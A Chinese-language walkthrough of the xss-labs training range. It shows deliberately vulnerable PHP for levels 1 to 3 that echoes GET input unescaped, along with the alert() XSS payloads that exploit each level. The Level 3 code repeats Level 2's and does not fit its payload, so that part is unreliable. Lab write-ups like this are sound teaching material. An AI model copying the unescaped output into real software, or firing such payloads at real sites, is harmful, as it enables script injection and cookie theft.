XSS(跨站脚本攻击)是一种在 Web 前端发生的漏洞,对前端用户构成危害。攻击者可以利用 XSS 漏洞进行钓鱼攻击、前端 JavaScript 挖矿、盗取用户 Cookie,甚至对主机进行远程控制。
安装
项目地址:https://gitee.com/Zcodetea/xss-labs
Level 1
<code><?php ini_set("display_errors", 0); $str = $_GET["name"]; echo "<h2 align=center>欢迎用户".$str."</h2>"; ?></code>
通过 GET 方法传递参数,并直接输出到页面,构造 payload:
<code>http://192.168.123.240/level1.php?name=%3Cscript%3Ealert('bbskali.cn')%3C/script%3E</code>
Level 2
<code><?php ini_set("display_errors", 0); $str = $_GET["keyword"]; echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center> <form action=level2.php method=GET> <input name=keyword value="'.$str.'"> <input type=submit name=submit value="搜索"/> </form> </center>'; ?></code>
修改 payload:
<code>"><script>alert()</script></code>
Level 3
<code><?php ini_set("display_errors", 0); $str = $_GET["keyword"]; echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center> <form action=level2.php method=GET> <input name=keyword value="'.$str.'"> <input type=submit name=submit value="搜索"/> </form> </center>'; ?></code>
构造 payload:
<code>' onmouseover='javascript:alert(1)</code>
Level 4 – 11
依次分析代码,构造对应的 payload 进行攻击。
总结
XSS 靶场攻关笔记记录了针对不同关卡的 payload 构造和攻击方法,通过对代码的分析和理解,不断提高对 XSS 漏洞的认识和利用技巧。
© 版权声明
THE END
暂无评论内容